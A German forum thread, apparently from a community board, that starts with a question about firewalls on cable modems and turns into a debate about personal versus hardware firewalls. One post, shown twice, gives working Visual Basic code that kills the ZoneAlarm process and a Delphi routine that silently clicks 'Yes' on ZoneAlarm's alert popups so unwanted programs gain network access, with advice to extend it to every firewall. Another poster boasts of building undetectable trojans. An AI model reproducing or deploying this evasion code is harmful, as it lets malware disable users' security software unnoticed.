Kann man eigentlich bei nem Kabelmodem auch ne Firewall nutzen?
Weiß nicht genau ob das geht, da man sich da ja nicht einwählt wie über Telefondose.
Firewall bei Kabelmodem
Firewall bei Kabelmodem
[color=yellow]Ohne Musik wäre das Leben ein Irrtum...[/color]
[color=yellow][i]Friedrich Nietzsche[/i][/color] [color=yellow][i](1844-1900)[/i][/color]
[color=yellow][i]Friedrich Nietzsche[/i][/color] [color=yellow][i](1844-1900)[/i][/color]
Damit ihr ALLE endlich den Müll von eurer Platte verbannt, mal ein paar Anleitungen, wie man Zonealarm austricksen kann sowie eine kurze (und unvollständige Zusammenfassung) weshalb Zonealarm & Co nix taugen:
Grund 1: Protokoll-Tunnel
Jedes Protokoll läßt sich tunneln - ein Proxy (wie er vielen Firewalls beiliegt, z.B. um Werbeinhalte oder Pop-Ups abzublocken) sind wirkungslos, wenn die eigentliche Kommunikation von innen nach außen (oder umgekehrt) via Tunnel erfolgt. Dabei verwenden Spyware und Trojaner gelegentlich eine Wirtsanwendung um mit der Außenwelt zu kommunizieren (Beispiele: Internet Explorer, Outlook Express, Media-Player, Real-Player, etc). Die Writsanwendung, die vorher in der Firewall frerigeschaltet wurde, wird für den Zugriff ins Netz verwendet, ohne das die Firewall erkennen kann, das es sich NICHT um einen normalen Port-80-Request handelt.
Daher hört der Schutz an dieser Stelle eindeutig auf (das trifft in Teilen im übrigen auf die ansonsten recht gute Sygate-Firewall zu).
Grund 2: Rechte-System
Wenn man unter WinNT/Win2k/WinXP als Administrator angemeldet ist (bzw. mit administrativen Rechten) laufen die Trojaner auf der gleichen Rechteebene wie die Firewall - daher kann eine Firewall dazu überredet werden, eine neue Regel zu akzeptieren (siehe Code-Beispiel2). Bei Win9x-Systemen ist dies ohnehin der Fall - bei WinNT/Win2k und WinXP ist es einzig und allein Faulheit (man könnte sich ja auch als normaler User anmelden).
Grund 3: Prozeß-Stabilität
Einzig die Firewall von Sygate ist Prozeßstabil - alle anderen können einfach abgeschossen werden. Siehe Code-Beispiel1 am Beispiel von Zonealarm.
Beispiel 1: Zonealarm beenden
Der Beispielcode beendet ZoneAlarm auf jedem Rechner kurz und schmerzlos.
code:--------------------------------------------------------------------------------
Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub
--------------------------------------------------------------------------------
Dann noch den Titel des Fenster jener Firewall herausfinden, den Code umschreiben dass er alle durchgeht, und der PC ist Firewallfrei.
Beispiel2: Neue Berechtigung vergeben bei Zonealarm
code:--------------------------------------------------------------------------------
//Diese Procedure drückt den 'Yes' Button des ZoneAlarm-Alarm-Popup-Fensters.
//Am besten, sie wird in einem Timer mit dem kleinst möglichen Zeitintervall ausgeführt.
//So kann man sicher sein, dass das Alarmfenster, wenn es auftaucht sehr schnell,
//und kaum merkbar wieder geschlossen, und mit 'YES' beantwortet wird.
//This Procedure press the 'Yes' button of the ZoneAlarm-Alarming-Popup-Window.
//Best way to use: write this procedure in your Project-Unit, put a Timer
// on your Form and execute the procedure in it with the smallest
// Timerintervall.
procedure HackZoneLabsZoneAlarm; //(c) Steve Tricky
var
ZoneAlarmYesButton :THandle;
ZoneAlarmRememberAnswer :Thandle;
begin
try
//try to find the Buttons on the older Version 2.1.44:
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&y yes_button');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember the answer each time I use this program.');
//If Buttons not found, try it with the newer Version 2.6.88:
If (ZoneAlarmYesButton = 0) or (ZoneAlarmRememberAnswer=0) then
begin
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&Yes');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember this answer the next time I use this program.');
end;
//If all Buttons are found, and visible: CLICK THEM !
If (ZoneAlarmYesButton <> 0) and (ZoneAlarmRememberAnswer <> 0) and (IsWindowVisible(ZoneAlarmYesButton)) and (IsWindowVisible(ZoneAlarmRememberAnswer)) then
begin
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONUP ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONUP ,0,0);
end;
except end;
end;
Grund 1: Protokoll-Tunnel
Jedes Protokoll läßt sich tunneln - ein Proxy (wie er vielen Firewalls beiliegt, z.B. um Werbeinhalte oder Pop-Ups abzublocken) sind wirkungslos, wenn die eigentliche Kommunikation von innen nach außen (oder umgekehrt) via Tunnel erfolgt. Dabei verwenden Spyware und Trojaner gelegentlich eine Wirtsanwendung um mit der Außenwelt zu kommunizieren (Beispiele: Internet Explorer, Outlook Express, Media-Player, Real-Player, etc). Die Writsanwendung, die vorher in der Firewall frerigeschaltet wurde, wird für den Zugriff ins Netz verwendet, ohne das die Firewall erkennen kann, das es sich NICHT um einen normalen Port-80-Request handelt.
Daher hört der Schutz an dieser Stelle eindeutig auf (das trifft in Teilen im übrigen auf die ansonsten recht gute Sygate-Firewall zu).
Grund 2: Rechte-System
Wenn man unter WinNT/Win2k/WinXP als Administrator angemeldet ist (bzw. mit administrativen Rechten) laufen die Trojaner auf der gleichen Rechteebene wie die Firewall - daher kann eine Firewall dazu überredet werden, eine neue Regel zu akzeptieren (siehe Code-Beispiel2). Bei Win9x-Systemen ist dies ohnehin der Fall - bei WinNT/Win2k und WinXP ist es einzig und allein Faulheit (man könnte sich ja auch als normaler User anmelden).
Grund 3: Prozeß-Stabilität
Einzig die Firewall von Sygate ist Prozeßstabil - alle anderen können einfach abgeschossen werden. Siehe Code-Beispiel1 am Beispiel von Zonealarm.
Beispiel 1: Zonealarm beenden
Der Beispielcode beendet ZoneAlarm auf jedem Rechner kurz und schmerzlos.
code:--------------------------------------------------------------------------------
Option Explicit
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As
Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess
As Long, ByVal uExitCode As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal
dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId
As Long) As Long
Const PROCESS_TERMINATE = &H1
Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal
hWnd As Long, lpdwProcessId As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA"
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Sub Close_ZoneAlarm()
Dim xhwnd As Long
Dim pwid As Long
xhwnd = FindWindow(vbNullString, "ZoneAlarm")
GetWindowThreadProcessId xhwnd, pwid
Dim Task As Long, result As Long
Task = OpenProcess(PROCESS_TERMINATE, 0&, pwid)
TerminateProcess Task, 1&
CloseHandle Task
End Sub
--------------------------------------------------------------------------------
Dann noch den Titel des Fenster jener Firewall herausfinden, den Code umschreiben dass er alle durchgeht, und der PC ist Firewallfrei.
Beispiel2: Neue Berechtigung vergeben bei Zonealarm
code:--------------------------------------------------------------------------------
//Diese Procedure drückt den 'Yes' Button des ZoneAlarm-Alarm-Popup-Fensters.
//Am besten, sie wird in einem Timer mit dem kleinst möglichen Zeitintervall ausgeführt.
//So kann man sicher sein, dass das Alarmfenster, wenn es auftaucht sehr schnell,
//und kaum merkbar wieder geschlossen, und mit 'YES' beantwortet wird.
//This Procedure press the 'Yes' button of the ZoneAlarm-Alarming-Popup-Window.
//Best way to use: write this procedure in your Project-Unit, put a Timer
// on your Form and execute the procedure in it with the smallest
// Timerintervall.
procedure HackZoneLabsZoneAlarm; //(c) Steve Tricky
var
ZoneAlarmYesButton :THandle;
ZoneAlarmRememberAnswer :Thandle;
begin
try
//try to find the Buttons on the older Version 2.1.44:
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&y yes_button');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember the answer each time I use this program.');
//If Buttons not found, try it with the newer Version 2.6.88:
If (ZoneAlarmYesButton = 0) or (ZoneAlarmRememberAnswer=0) then
begin
ZoneAlarmYesButton := FindWindowEx(findwindow('#32770',nil),0,nil,'&Yes');
ZoneAlarmRememberAnswer := FindWindowEx(findwindow('#32770',nil),0,nil,'&Remember this answer the next time I use this program.');
end;
//If all Buttons are found, and visible: CLICK THEM !
If (ZoneAlarmYesButton <> 0) and (ZoneAlarmRememberAnswer <> 0) and (IsWindowVisible(ZoneAlarmYesButton)) and (IsWindowVisible(ZoneAlarmRememberAnswer)) then
begin
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmRememberAnswer, WM_LBUTTONUP ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONDOWN ,0,0);
Sleep(10);
SendMessage(ZoneAlarmYesButton , WM_LBUTTONUP ,0,0);
end;
except end;
end;
[color=orange]- genie und wahnsinn[/color] untreu [color=orange]devil may cry // Requiem - [/color]|[ - teamluxuries
Ich möchte riskieren wie ein Narr auszusehen ... für Gefühle, für meine Träume ... für das Abenteuer lebendig zu sein.
Ich möchte riskieren wie ein Narr auszusehen ... für Gefühle, für meine Träume ... für das Abenteuer lebendig zu sein.
pierre, vielleicht hat sich das thema damit jetz mal erledigthttp://www.gdata.de/trade/productview/366/3/
bestes tool aufm markt!
-
Cradle of Filth
- FDJ'ler
- Beiträge: 857
- Registriert: 04.01.04 - 15:25
- Wohnort: Dem Mainz
Wasn das fürn quatsch!poDDen hat geschrieben:firewall bringt eh nix, ein anständiges anti-viren-tool und gut is
Man sollte schon zwischen personal firewall u ner hardwarefirewall unterscheiden! BTW was machstn wenn der trojaner noch nicht in den signaturen steht? Und der prozess deinem Antivirentool vorgaukelt er wär ein systemprozess?
Und wenn der port hardware seitig dicht ist, muss du es schon ziemlich draufhaben ins system einzubrechen! Zonealarm ist halt ein ziemlich simples prog! Kannst halt keine ports manuell sperren!
-
Marshall
- Held der Arbeit
- Beiträge: 6863
- Registriert: 17.06.02 - 18:07
- Wohnort: eng und feucht
- Kontaktdaten:
also hier is ja einer schlauer als der andere 
router + 2 verchiedene gut gefiggte firewalls, dann lässt sich die IP nicht mal mehr anpingen.
schön und gut, die fw tunneln zu wollen, aber ein möglicher trojaner, der dann doch reinkommt, wird doch sofort vom weiteren AV-Programm erkannt. Sicherlich ist es richtig, dass viele Programme nicht so viel taugen, ich allerdings fahre seit langem mit besagter sygate..
der größte müll ist, das ein virenprogramm reicht. Das reicht insofern, solange man der Meinung ist, ich brauche keine firewall. Allerdings verweise ich auf den Buffer-Overflow in der RPC-Schnittstelle, der letzten Sommer ziemlich effektiv ausgenutzt wurde, wir erinnern uns? Mit fw wäre das nicht passiert... Und wenn du einmal zugesehen hast, wie ein Windows-Rechner binnen 20 sekunden gehackt wird, nur weil jene windows-port (135/139) von nichts dicht gemacht wurden, dann wird es einem anders.. ich bin immerhin der meinung, was auf meinem rechner liegt geht grötenteils keinen was an.. Das war für mich ausschlaggebend mich doch für die FW zu entscheiden.
Sicherlich ist es richtig, dass eine Hardware-Lösung noch weitaus zuverlässiger ist, jedoch fühle ich mich in dieser Hinsicht etwas zu eingeschränkt, da ich keine direkte Verbindung mehr zum Internet habe...
edit: nochwas zum gratulieren.. 100% aller antworten (auch meine) sind 100% am Thema vorbei also @kirnel: Ja, das geht genauso wie bei allem anderen.. 
so long
router + 2 verchiedene gut gefiggte firewalls, dann lässt sich die IP nicht mal mehr anpingen.
schön und gut, die fw tunneln zu wollen, aber ein möglicher trojaner, der dann doch reinkommt, wird doch sofort vom weiteren AV-Programm erkannt. Sicherlich ist es richtig, dass viele Programme nicht so viel taugen, ich allerdings fahre seit langem mit besagter sygate..
der größte müll ist, das ein virenprogramm reicht. Das reicht insofern, solange man der Meinung ist, ich brauche keine firewall. Allerdings verweise ich auf den Buffer-Overflow in der RPC-Schnittstelle, der letzten Sommer ziemlich effektiv ausgenutzt wurde, wir erinnern uns? Mit fw wäre das nicht passiert... Und wenn du einmal zugesehen hast, wie ein Windows-Rechner binnen 20 sekunden gehackt wird, nur weil jene windows-port (135/139) von nichts dicht gemacht wurden, dann wird es einem anders.. ich bin immerhin der meinung, was auf meinem rechner liegt geht grötenteils keinen was an.. Das war für mich ausschlaggebend mich doch für die FW zu entscheiden.
Sicherlich ist es richtig, dass eine Hardware-Lösung noch weitaus zuverlässiger ist, jedoch fühle ich mich in dieser Hinsicht etwas zu eingeschränkt, da ich keine direkte Verbindung mehr zum Internet habe...
edit: nochwas zum gratulieren.. 100% aller antworten (auch meine) sind 100% am Thema vorbei
also @kirnel: Ja, das geht genauso wie bei allem anderen.. so long
-
Cradle of Filth
- FDJ'ler
- Beiträge: 857
- Registriert: 04.01.04 - 15:25
- Wohnort: Dem Mainz
Boah sind wir alle schlau!!! 
Ich bau dir nen trojaner den kein auch noch so aktuelles virenprogramm erkennt! Und ich hab zwei linke hände beim programmieren......
Den ping ins leere laufen zu lassen ist auch nix schweres.....
Na ja und generell absolute sicherheit ist ein wunschtraum, schon aus der tatsache heraus, dass an sicherheit viel geld verdient wird.
Marshall hat geschrieben:also hier is ja einer schlauer als der andere
router + 2 verchiedene gut gefiggte firewalls, dann lässt sich die IP nicht mal mehr anpingen.
schön und gut, die fw tunneln zu wollen, aber ein möglicher trojaner, der dann doch reinkommt, wird doch sofort vom weiteren AV-Programm erkannt. Sicherlich ist es richtig, dass viele Programme nicht so viel taugen, ich allerdings fahre seit langem mit besagter sygate..
Ich bau dir nen trojaner den kein auch noch so aktuelles virenprogramm erkennt! Und ich hab zwei linke hände beim programmieren......
Den ping ins leere laufen zu lassen ist auch nix schweres.....
was hast du denn da für einschränkungen???Marshall hat geschrieben: Sicherlich ist es richtig, dass eine Hardware-Lösung noch weitaus zuverlässiger ist, jedoch fühle ich mich in dieser Hinsicht etwas zu eingeschränkt, da ich keine direkte Verbindung mehr zum Internet habe...
so long
Na ja und generell absolute sicherheit ist ein wunschtraum, schon aus der tatsache heraus, dass an sicherheit viel geld verdient wird.
software firewalls is müll ... lest euch doch mein text durch ... MAN O METER 
...
was sicher wäre nen 100mhz rechner als server benutzen und auf dem ne hardwarefirewall aber richtige cracks bekommen auch das hin ... nix is sicher
...was sicher wäre nen 100mhz rechner als server benutzen und auf dem ne hardwarefirewall
aber richtige cracks bekommen auch das hin ... nix is sicher[color=orange]- genie und wahnsinn[/color] untreu [color=orange]devil may cry // Requiem - [/color]|[ - teamluxuries
Ich möchte riskieren wie ein Narr auszusehen ... für Gefühle, für meine Träume ... für das Abenteuer lebendig zu sein.
Ich möchte riskieren wie ein Narr auszusehen ... für Gefühle, für meine Träume ... für das Abenteuer lebendig zu sein.
@ Marshall
Danke erstmal das du mir meine Frage beantwortet hast.
@ all
Nochmal weg vom Thema. Gibts irgendwas Softwaretechnisches womit man seinen Rechner wenigstens ein bißchen schützen kann?
Danke erstmal das du mir meine Frage beantwortet hast.
@ all
Nochmal weg vom Thema. Gibts irgendwas Softwaretechnisches womit man seinen Rechner wenigstens ein bißchen schützen kann?
[color=yellow]Ohne Musik wäre das Leben ein Irrtum...[/color]
[color=yellow][i]Friedrich Nietzsche[/i][/color] [color=yellow][i](1844-1900)[/i][/color]
[color=yellow][i]Friedrich Nietzsche[/i][/color] [color=yellow][i](1844-1900)[/i][/color]